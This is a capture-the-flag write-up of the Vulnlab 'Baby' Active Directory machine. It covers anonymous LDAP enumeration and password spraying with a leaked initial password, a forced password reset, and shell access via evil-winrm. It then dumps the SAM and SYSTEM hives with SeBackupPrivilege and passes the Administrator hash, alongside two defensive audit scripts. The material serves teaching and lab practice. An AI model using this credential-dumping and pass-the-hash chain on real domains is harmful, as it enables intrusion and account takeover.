
Baby (VL) Writeup

Baby (Vulnlab)

Machine information

Feature: Baby
TTL: 127
Difficulty: Easy
Issue: Misconfiguration
From: Vulnlab
IP: 10.10.64.243

Information Recon

Nmap Summary

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2023-07-23T22:16:27+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=BabyDC.baby.vl
| Not valid before: 2023-07-22T22:07:41
|_Not valid after:  2024-01-21T22:07:41
| rdp-ntlm-info: 
|   Target_Name: BABY
|   NetBIOS_Domain_Name: BABY
|   NetBIOS_Computer_Name: BABYDC
|   DNS_Domain_Name: baby.vl
|   DNS_Computer_Name: BabyDC.baby.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2023-07-23T22:15:47+00:00
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
64158/tcp open  msrpc         Microsoft Windows RPC
64172/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: BABYDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2023-07-23T22:15:48
|_  start_date: N/A

Nmap TCP scan command

nmap -p- --open --min-rate 5000 -Pn -n -vvv 10.10.64.243 -oG AllPorts

Port Analysis

Port 3268 - LDAP

What is LDAP? LDAP (Lightweight Directory Access Protocol) is a network protocol used to access and manage directory information. It provides a hierarchical structure to store and organize data such as user accounts, passwords, and network resources. LDAP is commonly used for centralized authentication, allowing users to log in once and access various services securely. It simplifies the management of user information across multiple systems, making it ideal for large-scale networks. LDAP servers store data in a tree-like structure, with each node representing an entry containing attributes like names, addresses, and permissions. Its lightweight design and efficiency make it a popular choice for directory services in modern IT infrastructures.

This service holds directory information (user accounts, groups, descriptions) that can help gain access to the system. Normally credentials are required to query it, but since we don’t have any yet, we can check whether the server allows anonymous binds with the following command:

ldapsearch -x -b "dc=baby,dc=vl" "*" -H ldap://10.10.64.243

description: Built-in account for guest access to the computer/domain
distinguishedName: CN=Guest,CN=Users,DC=baby,DC=vl
instanceType: 4
--
description: All workstations and servers joined to the domain
distinguishedName: CN=Domain Computers,CN=Users,DC=baby,DC=vl
instanceType: 4
--
description: Members of this group are permitted to publish certificates to th
 e directory
distinguishedName: CN=Cert Publishers,CN=Users,DC=baby,DC=vl
--
description: All domain users
distinguishedName: CN=Domain Users,CN=Users,DC=baby,DC=vl
instanceType: 4
--
description: All domain guests
distinguishedName: CN=Domain Guests,CN=Users,DC=baby,DC=vl
instanceType: 4
--
description: Members in this group can modify group policy for the domain
member: CN=Administrator,CN=Users,DC=baby,DC=vl
distinguishedName: CN=Group Policy Creator Owners,CN=Users,DC=baby,DC=vl
--
description: Servers in this group can access remote access properties of user
 s
distinguishedName: CN=RAS and IAS Servers,CN=Users,DC=baby,DC=vl
--
description: Members in this group can have their passwords replicated to all 
 read-only domain controllers in the domain
distinguishedName: CN=Allowed RODC Password Replication Group,CN=Users,DC=baby
--
description: Members in this group cannot have their passwords replicated to a
 ny read-only domain controllers in the domain
member: CN=Read-only Domain Controllers,CN=Users,DC=baby,DC=vl
--
description: Members of this group are Read-Only Domain Controllers in the ent
 erprise
distinguishedName: CN=Enterprise Read-only Domain Controllers,CN=Users,DC=baby
--
description: Members of this group that are domain controllers may be cloned.
distinguishedName: CN=Cloneable Domain Controllers,CN=Users,DC=baby,DC=vl
instanceType: 4
--
description: Members of this group are afforded additional protections against
  authentication security threats. See http://go.microsoft.com/fwlink/?LinkId=
 298939 for more information.
--
description: DNS Administrators Group
distinguishedName: CN=DnsAdmins,CN=Users,DC=baby,DC=vl
instanceType: 4
--
description: DNS clients who are permitted to perform dynamic updates on behal
 f of some other clients (such as DHCP servers).
distinguishedName: CN=DnsUpdateProxy,CN=Users,DC=baby,DC=vl
--
description: Set initial password to BabyStart123!
givenName: Teresa
distinguishedName: CN=Teresa Bell,OU=it,DC=baby,DC=vl

It turns out that the server answers anonymous queries, and the most interesting result is the last entry: the description attribute of the user ‘Teresa Bell’ reads ‘Set initial password to BabyStart123!’, which gives us a username ‘teresa.bell’ and a password. So we can try these credentials against SMB or LDAP.
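The misconfiguration here is a credential left in a free-text attribute that anonymous binds can read. As an added example (not part of the original post), the following Python audit parses ldapsearch-style LDIF output, unfolds continuation lines (the " e directory" style wrapping visible above), and flags description values that mention a password; the sample LDIF is constructed from the entries shown above.

```python
import re

# Constructed sample in plain LDIF form, mirroring the anonymous ldapsearch output
# above; the first entry shows LDIF line folding (continuation lines start with a space).
SAMPLE_LDIF = """\
dn: CN=Cert Publishers,CN=Users,DC=baby,DC=vl
description: Members of this group are permitted to publish certificates to th
 e directory
distinguishedName: CN=Cert Publishers,CN=Users,DC=baby,DC=vl

dn: CN=Teresa Bell,OU=it,DC=baby,DC=vl
description: Set initial password to BabyStart123!
givenName: Teresa
distinguishedName: CN=Teresa Bell,OU=it,DC=baby,DC=vl
"""

# Heuristic: a whole word that usually means a secret was written into a free-text
# attribute (the \b boundaries keep "passwords replicated" group text out).
SECRET_HINT = re.compile(r"\b(password|passwd|pwd|pass)\b", re.IGNORECASE)


def parse_ldif(text):
    """Return one {attr: [values]} dict per entry, unfolding continuation lines."""
    entries, current, last_attr = [], {}, None
    for raw in text.splitlines():
        if raw.startswith(" ") and last_attr is not None:
            current[last_attr][-1] += raw[1:]      # RFC 2849 line folding
            continue
        if not raw.strip():                        # blank line ends an entry
            if current:
                entries.append(current)
            current, last_attr = {}, None
            continue
        attr, _, value = raw.partition(":")
        attr = attr.strip()
        current.setdefault(attr, []).append(value.lstrip(" "))
        last_attr = attr
    if current:
        entries.append(current)
    return entries


def find_credential_leaks(text):
    """Return (dn, description) pairs whose description looks like a credential."""
    hits = []
    for entry in parse_ldif(text):
        dn = entry.get("dn", entry.get("distinguishedName", ["?"]))[0]
        for desc in entry.get("description", []):
            if SECRET_HINT.search(desc):
                hits.append((dn, desc))
    return hits
```

Run the same function over a full `ldapsearch -x -LLL` dump of your own domain to find descriptions that should never have held a password.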

crackmapexec ldap 10.10.64.243 -u 'teresa.bell' -p 'BabyStart123!'

SMB  10.10.64.243 445  BABYDC  [-] baby.vl\Teresa Bell:BabyStart123! Error connecting to 

However, those don’t seem to be the correct credentials for that account, but the description tells us this password was set as someone’s initial password, so it is likely still valid for some account. So our next plan is to create a text file with the usernames and try them one by one. I created the following file:

Administrator
Guest
krbtgt
Domain Computers
Domain Controllers
Schema Admins
Enterprise Admins
Cert Publishers
Domain Admins
Domain Users
Domain Guests
Group Policy Creator Owners
RAS and IAS Servers
Allowed RODC Password Replication Group
Denied RODC Password Replication Group
Read-only Domain Controllers
Enterprise Read-only Domain Controllers
Cloneable Domain Controllers
Protected Users
Key Admins
Enterprise Key Admins
DnsAdmins
DnsUpdateProxy
dev
jacqueline.barnett
ashley.webb
hugh.george
leonard.dyer
connor.wilkinson
joseph.hughes
kerry.wilson
teresa.bell
caroline.robinson
ian.walker

Now, using crackmapexec, we will try to log in with the users from the list using the password ‘BabyStart123!’:

crackmapexec smb 10.10.64.243 -u users.txt -p 'BabyStart123!' 
SMB         10.10.64.243   445    BABYDC           [-]
baby.vl\caroline.robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE 

NICE! We found the user associated with the password. However, there’s something curious… That STATUS_PASSWORD_MUST_CHANGE means the account is required to change its password at next logon; this usually happens when a user has been given a temporary password.

Exploitation

To take advantage of this, we can use the ‘smbpasswd’ tool to change the password to something of our choosing.

smbpasswd -U BABY/caroline.robinson -r 10.10.104.152
Old SMB password:BabyStart123!
New SMB password:Star@123!
Retype new SMB password:Star@123!

Now, we just need to log in to the machine using evil-winrm:

evil-winrm -i 10.10.64.243 -u 'caroline.robinson' -p 'Star@123!'

And… OH NO!! AN ERROR!!!


After investigating, I discovered that AD has a script that resets everything every x minutes. So, we need to create a script that changes the password constantly. I created the following one-liner based on one from https://secure77.de/. Now, the main problem with this script is that you have to keep changing the new password manually, so I recommend changing just one letter to a special character.

export current_password='BabyStart123!'; export new_password='Start124!'; (echo "$current_password"; echo "$new_password"; echo "$new_password") | smbpasswd -s -U caroline.robinson -r 10.10.64.243 && evil-winrm -i 10.10.64.243 -u caroline.robinson -p "$new_password"

By using this, we can log into the machine, and we found the first flag VL{b2c61****}.

Privilege Escalation

Now that we are a user, we need to find a way to become a privileged user. To do this, we need to follow these steps:

whoami /all 

USER INFORMATION
----------------

User Name              SID
====================== ==============================================
baby\caroline.robinson S-1-5-21-1407081343-4001094062-1444647654-1111


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ==================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
BABY\it                                    Group            S-1-5-21-1407081343-4001094062-1444647654-1109 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.
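As an added Python helper (not from the original post), the following parses `whoami /all` output like the above, using the `====` ruler lines to locate column boundaries (so values containing spaces such as "Well-known group" are read correctly), and flags the Backup Operators membership and the backup/restore privileges that the next step relies on; the sample is a constructed excerpt of the output above, and the same check is what an auditor would run on a low-privilege account's token.

```python
import re

# Constructed excerpt of the `whoami /all` output above; spacing is copied so the rulers align.
WHOAMI_OUTPUT = r"""GROUP INFORMATION
-----------------
Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ==================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551                                   Mandatory group, Enabled by default, Enabled group

PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
"""

# Backup Operators (S-1-5-32-551) grants the privileges that bypass file ACLs on the SAM/SYSTEM hives.
RISKY_SIDS = {"S-1-5-32-551"}
RISKY_PRIVS = {"SeBackupPrivilege", "SeRestorePrivilege"}


def parse_table(lines):
    """Parse a whoami table; the '====' ruler defines the column spans."""
    header, ruler = lines[0], lines[1]
    spans = [(m.start(), m.end()) for m in re.finditer(r"=+", ruler)]
    names = [header[s:e].strip() for s, e in spans]
    rows = []
    for line in lines[2:]:
        if not line.strip():                     # blank line ends the table
            break
        rows.append({n: line[s:e].strip() for n, (s, e) in zip(names, spans)})
    return rows


def section_rows(output, title):
    lines = output.splitlines()
    start = lines.index(title)
    ruler = next(i for i in range(start, len(lines)) if lines[i].startswith("="))
    return parse_table(lines[ruler - 1:])        # header sits just above the ruler


def risky_findings(output):
    found = []
    for row in section_rows(output, "GROUP INFORMATION"):
        if row["SID"] in RISKY_SIDS:
            found.append(f"member of {row['Group Name']} ({row['SID']})")
    for row in section_rows(output, "PRIVILEGES INFORMATION"):
        if row["Privilege Name"] in RISKY_PRIVS and row["State"] == "Enabled":
            found.append(f"{row['Privilege Name']} enabled")
    return found
```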

The important part here is that we hold the SeBackupPrivilege and SeRestorePrivilege privileges (granted by membership in BUILTIN\Backup Operators). Following the steps in this article https://www.hackingarticles.in/windows-privilege-escalation-sebackupprivilege/, we can run the following commands:

Part 1: in the evil-winrm shell on the target, save the SAM and SYSTEM hives (SeBackupPrivilege lets us read them despite their ACLs)

cd c:\
mkdir Temp
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system

Part 2: still in evil-winrm, pull both files to the attacking machine with its built-in download command

cd Temp
download sam
download system

Part 3: on the attacking machine, extract the local account hashes from the two hives

pypykatz registry --sam sam system

...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8d992faed38128ae85e95fa35868bb43::

Now we have the Administrator NTLM hash, which evil-winrm can use directly (pass-the-hash) instead of a password:

evil-winrm -i 10.10.64.243 -u 'Administrator' -H '8d992faed38128ae85e95fa35868bb43'

With this, we can find the root flag VL{b8512958}.

Conclusion

In conclusion, “Baby” on the Vulnlab environment holds significant offensive value. This machine offers an excellent opportunity to enhance skills in reconnaissance, enumeration, and exploitation in Windows environments, particularly in the context of Active Directory.

It is crucial to emphasize the importance of adhering to secure practices while configuring services, such as avoiding anonymous access when unnecessary, using strong passwords, and ensuring that users do not possess unnecessary privileges. The configuration vulnerability that allowed anonymous access to the LDAP service proved to be a critical point for gathering information and advancing in privilege escalation.

Furthermore, the technique of repeatedly changing the password and utilizing tools like pypykatz to extract NTLM hashes are compelling strategies to maintain access and acquire privileged credentials.

Overall, “Baby” delivers a valuable learning experience to improve offensive security skills and underscores the significance of implementing sound security practices to safeguard enterprise environments.

This post is licensed under CC BY 4.0 by the author.